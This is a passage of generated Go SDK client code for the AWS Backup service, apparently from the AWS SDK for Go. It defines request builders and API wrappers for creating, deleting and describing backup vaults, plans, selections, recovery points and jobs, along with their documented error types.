func (c *Backup) CreateBackupSelectionWithContext(ctx aws.Context, input *CreateBackupSelectionInput, opts ...request.Option) (*CreateBackupSelectionOutput, error) {
req, out := c.CreateBackupSelectionRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opCreateBackupVault = "CreateBackupVault"
// CreateBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the CreateBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See CreateBackupVault for more information on using the CreateBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the CreateBackupVaultRequest method.
// req, resp := client.CreateBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupVault
func (c *Backup) CreateBackupVaultRequest(input *CreateBackupVaultInput) (req *request.Request, output *CreateBackupVaultOutput) {
op := &request.Operation{
Name: opCreateBackupVault,
HTTPMethod: "PUT",
HTTPPath: "/backup-vaults/{backupVaultName}",
}
if input == nil {
input = &CreateBackupVaultInput{}
}
output = &CreateBackupVaultOutput{}
req = c.newRequest(op, input, output)
return
}
// CreateBackupVault API operation for AWS Backup.
//
// Creates a logical container where backups are stored. A CreateBackupVault
// request includes a name, optionally one or more resource tags, an encryption
// key, and a request ID.
//
// Sensitive data, such as passport numbers, should not be included in the
// name of a backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation CreateBackupVault for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * LimitExceededException
// A limit in the request has been exceeded; for example, a maximum number of
// items allowed in a request.
//
// * AlreadyExistsException
// The required resource already exists.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/CreateBackupVault
func (c *Backup) CreateBackupVault(input *CreateBackupVaultInput) (*CreateBackupVaultOutput, error) {
req, out := c.CreateBackupVaultRequest(input)
return out, req.Send()
}
// CreateBackupVaultWithContext is the same as CreateBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See CreateBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) CreateBackupVaultWithContext(ctx aws.Context, input *CreateBackupVaultInput, opts ...request.Option) (*CreateBackupVaultOutput, error) {
req, out := c.CreateBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupPlan = "DeleteBackupPlan"
// DeleteBackupPlanRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupPlan operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupPlan for more information on using the DeleteBackupPlan
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DeleteBackupPlanRequest method.
// req, resp := client.DeleteBackupPlanRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupPlan
func (c *Backup) DeleteBackupPlanRequest(input *DeleteBackupPlanInput) (req *request.Request, output *DeleteBackupPlanOutput) {
op := &request.Operation{
Name: opDeleteBackupPlan,
HTTPMethod: "DELETE",
HTTPPath: "/backup/plans/{backupPlanId}",
}
if input == nil {
input = &DeleteBackupPlanInput{}
}
output = &DeleteBackupPlanOutput{}
req = c.newRequest(op, input, output)
return
}
// DeleteBackupPlan API operation for AWS Backup.
//
// Deletes a backup plan. A backup plan can only be deleted after all associated
// selections of resources have been deleted. Deleting a backup plan deletes
// the current version of a backup plan. Previous versions, if any, will still
// exist.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupPlan for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupPlan
func (c *Backup) DeleteBackupPlan(input *DeleteBackupPlanInput) (*DeleteBackupPlanOutput, error) {
req, out := c.DeleteBackupPlanRequest(input)
return out, req.Send()
}
// DeleteBackupPlanWithContext is the same as DeleteBackupPlan with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupPlan for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupPlanWithContext(ctx aws.Context, input *DeleteBackupPlanInput, opts ...request.Option) (*DeleteBackupPlanOutput, error) {
req, out := c.DeleteBackupPlanRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupSelection = "DeleteBackupSelection"
// DeleteBackupSelectionRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupSelection operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupSelection for more information on using the DeleteBackupSelection
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DeleteBackupSelectionRequest method.
// req, resp := client.DeleteBackupSelectionRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupSelection
func (c *Backup) DeleteBackupSelectionRequest(input *DeleteBackupSelectionInput) (req *request.Request, output *DeleteBackupSelectionOutput) {
op := &request.Operation{
Name: opDeleteBackupSelection,
HTTPMethod: "DELETE",
HTTPPath: "/backup/plans/{backupPlanId}/selections/{selectionId}",
}
if input == nil {
input = &DeleteBackupSelectionInput{}
}
output = &DeleteBackupSelectionOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupSelection API operation for AWS Backup.
//
// Deletes the resource selection associated with a backup plan that is specified
// by the SelectionId.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupSelection for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupSelection
func (c *Backup) DeleteBackupSelection(input *DeleteBackupSelectionInput) (*DeleteBackupSelectionOutput, error) {
req, out := c.DeleteBackupSelectionRequest(input)
return out, req.Send()
}
// DeleteBackupSelectionWithContext is the same as DeleteBackupSelection with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupSelection for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupSelectionWithContext(ctx aws.Context, input *DeleteBackupSelectionInput, opts ...request.Option) (*DeleteBackupSelectionOutput, error) {
req, out := c.DeleteBackupSelectionRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupVault = "DeleteBackupVault"
// DeleteBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupVault for more information on using the DeleteBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DeleteBackupVaultRequest method.
// req, resp := client.DeleteBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVault
func (c *Backup) DeleteBackupVaultRequest(input *DeleteBackupVaultInput) (req *request.Request, output *DeleteBackupVaultOutput) {
op := &request.Operation{
Name: opDeleteBackupVault,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}",
}
if input == nil {
input = &DeleteBackupVaultInput{}
}
output = &DeleteBackupVaultOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupVault API operation for AWS Backup.
//
// Deletes the backup vault identified by its name. A vault can be deleted only
// if it is empty.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupVault for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVault
func (c *Backup) DeleteBackupVault(input *DeleteBackupVaultInput) (*DeleteBackupVaultOutput, error) {
req, out := c.DeleteBackupVaultRequest(input)
return out, req.Send()
}
// DeleteBackupVaultWithContext is the same as DeleteBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupVaultWithContext(ctx aws.Context, input *DeleteBackupVaultInput, opts ...request.Option) (*DeleteBackupVaultOutput, error) {
req, out := c.DeleteBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupVaultAccessPolicy = "DeleteBackupVaultAccessPolicy"
// DeleteBackupVaultAccessPolicyRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupVaultAccessPolicy operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupVaultAccessPolicy for more information on using the DeleteBackupVaultAccessPolicy
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DeleteBackupVaultAccessPolicyRequest method.
// req, resp := client.DeleteBackupVaultAccessPolicyRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultAccessPolicy
func (c *Backup) DeleteBackupVaultAccessPolicyRequest(input *DeleteBackupVaultAccessPolicyInput) (req *request.Request, output *DeleteBackupVaultAccessPolicyOutput) {
op := &request.Operation{
Name: opDeleteBackupVaultAccessPolicy,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}/access-policy",
}
if input == nil {
input = &DeleteBackupVaultAccessPolicyInput{}
}
output = &DeleteBackupVaultAccessPolicyOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupVaultAccessPolicy API operation for AWS Backup.
//
// Deletes the policy document that manages permissions on a backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupVaultAccessPolicy for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultAccessPolicy
func (c *Backup) DeleteBackupVaultAccessPolicy(input *DeleteBackupVaultAccessPolicyInput) (*DeleteBackupVaultAccessPolicyOutput, error) {
req, out := c.DeleteBackupVaultAccessPolicyRequest(input)
return out, req.Send()
}
// DeleteBackupVaultAccessPolicyWithContext is the same as DeleteBackupVaultAccessPolicy with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupVaultAccessPolicy for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupVaultAccessPolicyWithContext(ctx aws.Context, input *DeleteBackupVaultAccessPolicyInput, opts ...request.Option) (*DeleteBackupVaultAccessPolicyOutput, error) {
req, out := c.DeleteBackupVaultAccessPolicyRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteBackupVaultNotifications = "DeleteBackupVaultNotifications"
// DeleteBackupVaultNotificationsRequest generates a "aws/request.Request" representing the
// client's request for the DeleteBackupVaultNotifications operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteBackupVaultNotifications for more information on using the DeleteBackupVaultNotifications
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DeleteBackupVaultNotificationsRequest method.
// req, resp := client.DeleteBackupVaultNotificationsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultNotifications
func (c *Backup) DeleteBackupVaultNotificationsRequest(input *DeleteBackupVaultNotificationsInput) (req *request.Request, output *DeleteBackupVaultNotificationsOutput) {
op := &request.Operation{
Name: opDeleteBackupVaultNotifications,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}/notification-configuration",
}
if input == nil {
input = &DeleteBackupVaultNotificationsInput{}
}
output = &DeleteBackupVaultNotificationsOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteBackupVaultNotifications API operation for AWS Backup.
//
// Deletes event notifications for the specified backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteBackupVaultNotifications for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteBackupVaultNotifications
func (c *Backup) DeleteBackupVaultNotifications(input *DeleteBackupVaultNotificationsInput) (*DeleteBackupVaultNotificationsOutput, error) {
req, out := c.DeleteBackupVaultNotificationsRequest(input)
return out, req.Send()
}
// DeleteBackupVaultNotificationsWithContext is the same as DeleteBackupVaultNotifications with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteBackupVaultNotifications for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteBackupVaultNotificationsWithContext(ctx aws.Context, input *DeleteBackupVaultNotificationsInput, opts ...request.Option) (*DeleteBackupVaultNotificationsOutput, error) {
req, out := c.DeleteBackupVaultNotificationsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDeleteRecoveryPoint = "DeleteRecoveryPoint"
// DeleteRecoveryPointRequest generates a "aws/request.Request" representing the
// client's request for the DeleteRecoveryPoint operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DeleteRecoveryPoint for more information on using the DeleteRecoveryPoint
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DeleteRecoveryPointRequest method.
// req, resp := client.DeleteRecoveryPointRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteRecoveryPoint
func (c *Backup) DeleteRecoveryPointRequest(input *DeleteRecoveryPointInput) (req *request.Request, output *DeleteRecoveryPointOutput) {
op := &request.Operation{
Name: opDeleteRecoveryPoint,
HTTPMethod: "DELETE",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}",
}
if input == nil {
input = &DeleteRecoveryPointInput{}
}
output = &DeleteRecoveryPointOutput{}
req = c.newRequest(op, input, output)
req.Handlers.Unmarshal.Swap(restjson.UnmarshalHandler.Name, protocol.UnmarshalDiscardBodyHandler)
return
}
// DeleteRecoveryPoint API operation for AWS Backup.
//
// Deletes the recovery point specified by a recovery point ID.
//
// If the recovery point ID belongs to a continuous backup, calling this endpoint
// deletes the existing continuous backup and stops future continuous backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DeleteRecoveryPoint for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * InvalidResourceStateException
// AWS Backup is already performing an action on this recovery point. It can't
// perform the action you requested until the first action finishes. Try again
// later.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * InvalidRequestException
// Indicates that something is wrong with the input to the request. For example,
// a parameter is of the wrong type.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DeleteRecoveryPoint
func (c *Backup) DeleteRecoveryPoint(input *DeleteRecoveryPointInput) (*DeleteRecoveryPointOutput, error) {
req, out := c.DeleteRecoveryPointRequest(input)
return out, req.Send()
}
// DeleteRecoveryPointWithContext is the same as DeleteRecoveryPoint with the addition of
// the ability to pass a context and additional request options.
//
// See DeleteRecoveryPoint for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DeleteRecoveryPointWithContext(ctx aws.Context, input *DeleteRecoveryPointInput, opts ...request.Option) (*DeleteRecoveryPointOutput, error) {
req, out := c.DeleteRecoveryPointRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeBackupJob = "DescribeBackupJob"
// DescribeBackupJobRequest generates a "aws/request.Request" representing the
// client's request for the DescribeBackupJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeBackupJob for more information on using the DescribeBackupJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DescribeBackupJobRequest method.
// req, resp := client.DescribeBackupJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupJob
func (c *Backup) DescribeBackupJobRequest(input *DescribeBackupJobInput) (req *request.Request, output *DescribeBackupJobOutput) {
op := &request.Operation{
Name: opDescribeBackupJob,
HTTPMethod: "GET",
HTTPPath: "/backup-jobs/{backupJobId}",
}
if input == nil {
input = &DescribeBackupJobInput{}
}
output = &DescribeBackupJobOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeBackupJob API operation for AWS Backup.
//
// Returns backup job details for the specified BackupJobId.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeBackupJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * DependencyFailureException
// A dependent AWS service or resource returned an error to the AWS Backup service,
// and the action cannot be completed.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupJob
func (c *Backup) DescribeBackupJob(input *DescribeBackupJobInput) (*DescribeBackupJobOutput, error) {
req, out := c.DescribeBackupJobRequest(input)
return out, req.Send()
}
// DescribeBackupJobWithContext is the same as DescribeBackupJob with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeBackupJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeBackupJobWithContext(ctx aws.Context, input *DescribeBackupJobInput, opts ...request.Option) (*DescribeBackupJobOutput, error) {
req, out := c.DescribeBackupJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeBackupVault = "DescribeBackupVault"
// DescribeBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the DescribeBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeBackupVault for more information on using the DescribeBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DescribeBackupVaultRequest method.
// req, resp := client.DescribeBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupVault
func (c *Backup) DescribeBackupVaultRequest(input *DescribeBackupVaultInput) (req *request.Request, output *DescribeBackupVaultOutput) {
op := &request.Operation{
Name: opDescribeBackupVault,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}",
}
if input == nil {
input = &DescribeBackupVaultInput{}
}
output = &DescribeBackupVaultOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeBackupVault API operation for AWS Backup.
//
// Returns metadata about a backup vault specified by its name.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeBackupVault for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeBackupVault
func (c *Backup) DescribeBackupVault(input *DescribeBackupVaultInput) (*DescribeBackupVaultOutput, error) {
req, out := c.DescribeBackupVaultRequest(input)
return out, req.Send()
}
// DescribeBackupVaultWithContext is the same as DescribeBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeBackupVaultWithContext(ctx aws.Context, input *DescribeBackupVaultInput, opts ...request.Option) (*DescribeBackupVaultOutput, error) {
req, out := c.DescribeBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opDescribeCopyJob = "DescribeCopyJob"
// DescribeCopyJobRequest generates a "aws/request.Request" representing the
// client's request for the DescribeCopyJob operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See DescribeCopyJob for more information on using the DescribeCopyJob
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the DescribeCopyJobRequest method.
// req, resp := client.DescribeCopyJobRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeCopyJob
func (c *Backup) DescribeCopyJobRequest(input *DescribeCopyJobInput) (req *request.Request, output *DescribeCopyJobOutput) {
op := &request.Operation{
Name: opDescribeCopyJob,
HTTPMethod: "GET",
HTTPPath: "/copy-jobs/{copyJobId}",
}
if input == nil {
input = &DescribeCopyJobInput{}
}
output = &DescribeCopyJobOutput{}
req = c.newRequest(op, input, output)
return
}
// DescribeCopyJob API operation for AWS Backup.
//
// Returns metadata associated with creating a copy of a resource.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation DescribeCopyJob for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/DescribeCopyJob
func (c *Backup) DescribeCopyJob(input *DescribeCopyJobInput) (*DescribeCopyJobOutput, error) {
req, out := c.DescribeCopyJobRequest(input)
return out, req.Send()
}
// DescribeCopyJobWithContext is the same as DescribeCopyJob with the addition of
// the ability to pass a context and additional request options.
//
// See DescribeCopyJob for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) DescribeCopyJobWithContext(ctx aws.Context, input *DescribeCopyJobInput, opts ...request.Option) (*DescribeCopyJobOutput, error) {
req, out := c.DescribeCopyJobRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
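// Example (illustrative sketch, not generated reference documentation): the
// error-handling pattern the comments above describe, using a runtime type
// assertion to awserr.Error. The copy job ID is a placeholder assumption.
//
//    out, err := svc.DescribeCopyJob(&backup.DescribeCopyJobInput{
//        CopyJobId: aws.String("copy-job-id"), // hypothetical ID
//    })
//    if err != nil {
//        if aerr, ok := err.(awserr.Error); ok {
//            switch aerr.Code() {
//            case backup.ErrCodeResourceNotFoundException:
//                // no copy job with that ID exists
//            default:
//                fmt.Println(aerr.Code(), aerr.Message())
//            }
//        }
//        return
//    }
//    fmt.Println(out)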
const opDescribeGlobalSettings = "DescribeGlobalSettings"
// DescribeGlobalSettingsRequest generates a "aws/request.Request" representing the
// client's request for the DescribeGlobalSettings operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
